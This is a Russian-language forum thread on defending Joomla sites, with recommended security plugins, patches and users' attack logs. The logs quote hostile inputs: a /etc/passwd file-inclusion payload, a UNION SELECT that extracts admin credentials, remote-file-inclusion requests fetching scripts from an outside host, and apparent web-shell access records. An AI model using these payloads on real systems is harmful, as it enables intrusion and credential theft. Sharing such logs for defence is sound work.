0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 249057 Просмотров
*

wishlight

  • Гуру
  • 5002
  • 295 / 1
  • от 150 руб быстрый хостинг без блокировок
========================================================
От модератора:

1. Логи выкладывайте строго под спойлер!

2. Запрещено цитировать сообщения целиком. Цитируя, апеллируйте к конкретной фразе.


========================================================

Обновлено 10.01.2018 - Добавил компонент Eyesite.

Здесь я собрал ссылки на понравившиеся мне расширения по защите сайтов. Это мало касается правильной защиты сервера, на котором расположены сайты. Необходимо следить за тем, чтобы программное обеспечение сервера было актуальным, без уязвимостей и правильно настроенным. В любом случае на шаред хостингах за вас это должен делать хостер. На своем сервере без "расширенного администрирования" вы сами отвечаете за безопасность.

Вы можете обратиться ко мне для лечения вашего сайта, если у вас есть в этом необходимость.

Контакты:
Спойлер
[свернуть]

Еще сюда вы можете выложить лог атаки на ваш сайт или что либо еще, что может быть полезным для сообщества.

Ниже представлена информация по теме:

Securitycheck - Бесплатный firewall который пишет логи + возможность проверки расширений Joomla на уязвимость. Мне понравился. Устанавливаем и он уже готов к работе.

Еще есть 2 плагина которые защищают от некоторых типов попыток взлома Joomla. Так же они пишут логи. Теоретически они способны предотвратить неизвестную атаку (Так же создать кучу проблем с работой компонентов. В таком случае их можно выключить или попробовать другой).

Marco's SQL Injection - отсылает письма с логом атаки.

и

jHackGuard -пишет лог в logs/jhackguard-log.php

jHackGuard требует регистрации для загрузки. Архивы с плагином выложил в прикрепленных файлах. Выложена версия 1.4.1. В 1.4.2 есть некоторые требования для хостинга, то есть он не везде работает корректно.

Скриншоты и примеры настроек:

Securitycheck - работает сразу после установки. Если включена защита сессии админа в настройках плагина невозможен одновременный логин под одним аккаунтом админа с разных устройств.

Компонент:
Спойлер
[свернуть]
Плагин:
Спойлер
[свернуть]
Логи:
Спойлер
[свернуть]

Marco's SQL Injection - необходимо внести некоторые настройки и активировать плагин. Настройки на скриншоте.
Спойлер
[свернуть]

jHackGuard - после установки необходимо активировать плагин.
Спойлер
[свернуть]

Вполне возможно поможет в борьбе с уязвимостями.

Вместе вроде работают без проблем.

Также можно обратить внимание на эти бесплатные расширения из раздела Site Security каталога расширений Joomla.

Спойлер
[свернуть]

Снизу случайные примеры.

Логи доступа посложнее будет просмотреть, чем эти.

Отдельное спасибо авторам плагинов.

AI-Bolit — это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге. Действительно один из лучших из бесплатных.
Спойлер
[свернуть]

Версия AI-Bolit для Windows - позволяет проверить сайт на локальном ПК с установленной Windows.

Сканер поиска Shell and BackDoor - отдельное спасибо flyingspook

Его же новый сканер, имеющий платную и бесплатную версии, но и в бесплатной уже более широкий функционал.
Спойлер
[свернуть]
Скрипт удаления вредоносного кода от icom
Спойлер
[свернуть]
Dr.Web Cureit - утилита от Dr.Web. Хорошо ищет шеллы в бекапах и  вирусы на вашем пк.

Если вдруг вы не можете зайти на сайты антивирусов, то Dr.Web Cureit скачать можно отсюда.

Дополнительные расширения для защиты сайта от спама, флуда и атак админок:

Admin Tools - имеет множество функций в том числе защита дополнительным паролем каталога администратора с помощью .htaccess

Компонент:
Спойлер
[свернуть]
Функция защиты админки:
Спойлер
[свернуть]

EasyCalcCheck Plus - плагин предназначенный для борьбы со спамом на вашем сайте. Возможно подключать несколько типов CAPTCHA (reCAPTCHA, цифровая CAPTCHA), блокирование активности ботов по правилам пользователя, службы типа Akismet для фильтрации спама, скрытие админки и базовая защита от атак. Поддерживается интеграция со сторонними компонентами.

Настройки CAPTCHA:
Спойлер
[свернуть]
Интеграция со сторонними компонентами и функции защиты:
Спойлер
[свернуть]
Антиспам:
Спойлер
[свернуть]

Возможно кому-нибудь пригодится мониторинг новых файлов в каталоге сайта встроенный в Joomla. Для этого можно использовать компонент Eyesite.

Спойлер
[свернуть]

Некоторые файлы пришлось выложить на Google Drive в связи с правилами форума.

jHackGuard для версии Joomla 3+
jHackGuard для версии Joomla 2.5
jHackGuard для версии Joomla 1.5

Зеркало для загрузки скрипта для поиска вредоносного кода AI-Bolit

[#31626] Unauthorized file upload security issue - несанкционированная загрузка файлов. Распаковать и залить поверх обновленной Joomla 1.5.26 по ftp.
Патч Joomla 1.5.26

[20151201] - Core - Remote Code Execution Vulnerability. Из-за недостаточной проверки сессий в браузере возможно выполнение удаленного кода. Распаковать и залить поверх по ftp.
Патч Joomla 1.5.26
Патч Joomla 2.5.28

Напишите мне, если необходимо что-нибудь добавить или вы нашли ошибку.

У многих на странички с текстом вредоносного кода ругается антивирус. В этом случае можно сделать скриншот кода на этом сервисе:

Конвертер кода в изображение

Сервис годится для любых текстов. Для примера выложил отчет Marco's SQL Injection, хотя на него антивирус ругаться не будет:

Спойлер
[свернуть]
« Последнее редактирование: 11.01.2018, 20:56:18 от wishlight »
*

wishlight

  • Гуру
  • 5002
  • 295 / 1
  • от 150 руб быстрый хостинг без блокировок
Пример:

Marco's SQL Injection лог



** Local File Inclusion [GET:amp;controller] => ../../../../../../../../../../etc/passwd\0
** Local File Inclusion [REQUEST:amp;controller] => ../../../../../../../../../../etc/passwd\0

**PAGE / SERVER INFO


*REMOTE_ADDR :
94.179.198.35

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_juliaportfolio&controller=../../../../../../../../../../etc/passwd%00



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_juliaportfolio
 -[amp;controller] => ../../../../../../../../../../etc/passwd\0


*$_POST DUMP


*$_COOKIE DUMP
 -[d13f04353066f3ab4ccbafe0dc6fa697] => 72a07f922bcb46f8318026fabc3982b4
 -[__utma] => 66701246.1816384113.1325848141.1325848141.1325848141.1
 -[__utmb] => 66701246.4.10.1325848141
 -[__utmc] => 66701246
 -[__utmz] => 66701246.1325848141.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)


*$_REQUEST DUMP
 -[option] => com_juliaportfolio
 -[amp;controller] => ../../../../../../../../../../etc/passwd\0
 -[d13f04353066f3ab4ccbafe0dc6fa697] => 72a07f922bcb46f8318026fabc3982b4
 -[__utma] => 66701246.1816384113.1325848141.1325848141.1325848141.1
 -[__utmb] => 66701246.4.10.1325848141
 -[__utmc] => 66701246
 -[__utmz] => 66701246.1325848141.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)




« Последнее редактирование: 25.12.2012, 11:39:20 от wishlight »
*

wishlight

  • Гуру
  • 5002
  • 295 / 1
  • от 150 руб быстрый хостинг без блокировок
Пример:

jHackGuard

2012-01-06   11:12:51   INFO   ::1   -   Changed GET value from:     -9999 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from jos_users/* to:    -9999  SELECT 1,(username,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from /*

« Последнее редактирование: 06.01.2012, 15:37:39 от wishlight »
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Спасибо! Буду пробовать настроить Marco's SQL Injection. Уже давно хотел заняться этим вопросом.
З.Ы. в заголовок темы очепятка прокралась. "выкладывать" будет правильнее :)
« Последнее редактирование: 06.01.2012, 18:43:51 от Langoliers »
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
От себя добавлю: при включении плагина Marco's SQL Injection проследите за приложениями, которые отправляют любые запросы "за пределы сайта" такие как модуль Twitter, плагин Social Share Buttons и т.п.
Если настройки плагина были по умолчанию, то подобные расширения работать не будут, нужно будет внести их в список игнорируемых.
*

wishlight

  • Гуру
  • 5002
  • 295 / 1
  • от 150 руб быстрый хостинг без блокировок
У меня все отлично в этом плане. Стоит ValAddThis plugin и все отправляется. Настроено именно так, как на картинке.

Может тему закрепить? К модераторам.
« Последнее редактирование: 06.01.2012, 20:45:34 от wishlight »
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
А у меня как раз таки ошибки посыпались с модуля твиттера и Social Share Buttons v1.3 =\

И кстати твиттер не модуль для джумлы, а подключенно в модуль HTML через API твиттера

И вот обнаружил что уже есть версия 1.4 плагина Social Share Buttons. ща поставлю и погляжу что будет
« Последнее редактирование: 06.01.2012, 21:02:14 от Langoliers »
*

wishlight

  • Гуру
  • 5002
  • 295 / 1
  • от 150 руб быстрый хостинг без блокировок
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
wishlight
А тебе этот парень с Казани часто в логах попадается ?

IP 94.180.136.142
а бот  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
*

wishlight

  • Гуру
  • 5002
  • 295 / 1
  • от 150 руб быстрый хостинг без блокировок
*

wayn

  • Захожу иногда
  • 72
  • 0 / 0
У меня так ваще странная ситуация. Изначально была проблема с зараженными файлами типа base64_decode(. Обсуждалась здесь. Вроде скриптом ве подобрал, удалил. Жалоб нет.

На второй хостинг площадке (уже с другими сайтами) была таже проблема. Вроде тоже все вылечил. Все нормально было "пока". Вскоре обнаруживаю что аккаунт хостинка рубанули. Позвонил, сказали что от меня шлется спам. Причем ломали именно не основной домен хостинга, а дополнительный. На сайте были установлены только JoomShopping, его брал с их оффсайта. Спам слал сломанный файл конфигурации. Вот он.

Снес. Поставил все заного. Через несколько дней опять тоже самое. Еще и появились какие-то странные файлы весом 50-100 кб. Опять снес, пароли поменял. Поставил просто Joomla, взятую с Joomla.ru версия 1.5.25. Через несколько часов началось опять что-то непонятное. В папке logs появилась какая-то папка easywebsoc.td.com и кто-то реально ломится. Что делать не знаю. Заказ весит. Времени нет. Даже работать нормально не получается. Где дыра не понятно.

Логи не знаю где брать. Брал с хостинг панели. Т.е. основная атака идет именно на папку star.

Спойлер
[свернуть]
*

wayn

  • Захожу иногда
  • 72
  • 0 / 0
До сих пор долбят какой-то файл anz.html в папке с компонентами. Я аж JoomShopping боюсь ставить. Подскажите как влияют на уязвимость права на папки в опциях Joomla, т.е. доступные на запись?
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
У меня это выглядит так

Спойлер
[свернуть]
-->
[свернуть]


3. закиндиваем .htacces следующего содержания
Спойлер
[свернуть]
вовсе папки откуда не должны запрашиваться файлы пользователем, пример: /administrator - /language - /libraries - /и т.д. (в приведеном выше примере 1. это прописывается но думаю лишнем не будет)

4. на файлы: configuration.php, .htaccess права 444

P.s. Есть неудобства с php.ini и configuration.php при установке расширений или изменении конфигурации для php.ini закоменнтировать: open_basedir и disable_functions и меняем права на configuration.php
Думаю лучше потратить минуту на это чем постоянно что то искать и лечить -->
[свернуть]

« Последнее редактирование: 07.02.2012, 16:16:25 от oriol »
*

wayn

  • Захожу иногда
  • 72
  • 0 / 0
Тоже решил поставить на configuration.php права 444. Просто интересно откуда зараза эта лезит. Часов 5 пустая Joomla весит вроде пока ничего.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
*

wayn

  • Захожу иногда
  • 72
  • 0 / 0
Поставил все, подчистил снова. По совету oriol также установил Eyesite. Пока полет нормальный. Бэкапы просканировал AVPTool, вроде все чисто. Ждем.
*

goodtm

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Привет
Вот такие запросы в своих логах обнаружил
Вроде точно такие же запросы и с 207.20.226.122, 192.167.9.177

Спойлер
[свернуть]
« Последнее редактирование: 25.02.2012, 23:44:00 от goodtm »
*

wishlight

  • Гуру
  • 5002
  • 295 / 1
  • от 150 руб быстрый хостинг без блокировок
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Протестил Marco's SQL Injection. Провел серию атак на свой сайт. Кое что блокировал... Так скажем 50%. И прислал логи на почту. Часть не допустил htaccess, еще часть firewall на сервере. Так что в совокупности пробить не получилось... Использовал базу уязвимостей OWASP.
Так что расширение довольно полезное... И не грузит систему, как некоторые компоненты "фаерволлов"
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Admin Tools, кто нибудь юзал? Какие функции вообще выполняет?
*

usemind

  • Осваиваюсь на форуме
  • 33
  • 4 / 0
Date   Time   Cause   IP   Name   User agent   Request method   Request URI   Comment
2012-03-03   14:32:10   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/AppServ-%D0%BB%D0%B5%D0%B3%D0%BA%D0%B8%D0%B9-%D1%81%D1%82%D0%B0%D1%80%D1%82-%D0%B4%D0%BB%D1%8F-web-%D1%80%D0%B0%D0%B7%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%87%D0%B8%D0%BA%D0%B0/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt??   
2012-03-03   14:32:12   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/AppServ-%D0%BB%D0%B5%D0%B3%D0%BA%D0%B8%D0%B9-%D1%81%D1%82%D0%B0%D1%80%D1%82-%D0%B4%D0%BB%D1%8F-web-%D1%80%D0%B0%D0%B7%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%87%D0%B8%D0%BA%D0%B0/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/pintery.txt??   
2012-03-03   14:32:16   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt??   
2012-03-03   14:32:18   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/pintery.txt??   
2012-03-03   14:32:22   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt??   
2012-03-03   14:32:24   Image file name with command in URL   218.188.39.33   218.188.39.33   Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)   GET   /%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B/%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82/appserv/main.php?appserv_root=http://kalyanpgcollege.org/portal/images/core/define/php/pintery.txt??   

http://kalyanpgcollege.org/portal/images/core/define/php/spread.txt

05.03.2012 17:45:28   Real-time file system protection   file   C:\Users\///\AppData\Local\Opera\Opera\cache\g_0053\opr0QX0U.tmp   PHP/IRCBot.NAA trojan   cleaned by deleting - quarantined   ////   Event occurred on a file modified by the application: C:\Program Files (x86)\Opera\opera.exe.
*

Иван

  • Осваиваюсь на форуме
  • 49
  • 0 / 0
Добрый день.
Обнаружил у себя недавно такое:
Код
188.165.125.51 - - [27/Feb/2012:23:50:45 +0200] "POST /cgi-bin/test.pl HTTP/1.1" 200 9215 "http://www.мойсайт.com.ua/cgi-bin/test.pl" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:07 +0200] "POST /images/f.php HTTP/1.1" 200 2933 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:40 +0200] "GET /cgi-bin/test.pl HTTP/1.1" 200 133 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:48 +0200] "POST /cgi-bin/test.pl HTTP/1.1" 200 6850 "http://www.мойсайт.com.ua/cgi-bin/test.pl" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:09 +0200] "POST /images/f.php HTTP/1.1" 200 2950 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:00 +0200] "GET /images/f.php HTTP/1.1" 200 4878 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:39 +0200] "GET /cgi-bin/test.pl HTTP/1.1" 301 244 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:25 +0200] "POST /images/f.php HTTP/1.1" 200 2879 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:11 +0200] "POST /images/f.php HTTP/1.1" 200 4886 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:50:53 +0200] "POST /cgi-bin/test.pl HTTP/1.1" 200 6970 "http://www.мойсайт.com.ua/cgi-bin/test.pl" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:16 +0200] "POST /images/f.php HTTP/1.1" 200 5945 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:42 +0200] "POST /images/f.php HTTP/1.1" 200 3300 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:32 +0200] "POST /images/f.php HTTP/1.1" 200 5967 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:54 +0200] "GET /site/ HTTP/1.1" 200 5643 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:55 +0200] "GET /site/page_files/pyeytnvo94318.gif HTTP/1.1" 200 2063 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:54 +0200] "GET /site/page_files/rwlwupzl1191.css HTTP/1.1" 200 1195 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:55 +0200] "GET /site/page_files/cx4clzwzsqjs1142.gif HTTP/1.1" 200 1104 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:38 +0200] "POST /images/f.php HTTP/1.1" 200 3183 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:55 +0200] "GET /site/page_files/hsipikncqy5395.gif HTTP/1.1" 200 1936 "http://www.мойсайт.com.ua/site/" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"
188.165.125.51 - - [27/Feb/2012:23:51:46 +0200] "POST /images/f.php HTTP/1.1" 200 3364 "http://www.мойсайт.com.ua/images/f.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.10.229 Version/11.61"

Каком образом это произошло - украли пароли?
Есть этот файл test.pl
Его выкладывать или как?
*

wishlight

  • Гуру
  • 5002
  • 295 / 1
  • от 150 руб быстрый хостинг без блокировок
Желательно код выложить, пригодится для разборки людям на форуме.
*

Иван

  • Осваиваюсь на форуме
  • 49
  • 0 / 0
« Последнее редактирование: 09.03.2012, 21:00:00 от Иван »
*

Иван

  • Осваиваюсь на форуме
  • 49
  • 0 / 0
*

Иван

  • Осваиваюсь на форуме
  • 49
  • 0 / 0
И еще нашел старый файл -includes/domit/domit.php,чисто случайно (поискал строчку из предыдущего файла (поиск-x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\)
Спойлер
[свернуть]
*

Иван

  • Осваиваюсь на форуме
  • 49
  • 0 / 0
Может у кого есть мнения. Откуда и как оно пролезло. Если украли пароли, то это както спокойней. А если уязвимость, то хрен я ее найду - из знаний только дедуктивный метод тыка
*

Saber

  • Осваиваюсь на форуме
  • 49
  • 1 / 0
У меня выделенный сервер, на нём десятка 2-3 сайтов на разных ЦМС

во всех сайты массово начали ломиться боты.
Сервер вроде настроен неплохо что потеря одного сайта не отразится на остальных, все в изолированных песочницах.



Вот к WP










к чему всё это.
до этого у меня был сервер где небыло песочниц для каждого сайта и подобрал пароль к одному сайту чуваки установили модуль.

mod_system в котором был обычный phpShell с этого шела достали все остальные сайты и где в шаблон где в сам сайт понафигачили всякой херни...

но вижу что примерно с 1-3го марта боты сильно активихированись или на нулледе или на античате видимо выложили каокй-то скрпит или что что подбирает пароли..

в общем нужен плагин или модуль что при 3х попытках выводит капчу
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 900
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1689
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1521
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 563
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1192
Последний ответ 03.11.2020, 17:36:03
от Cedars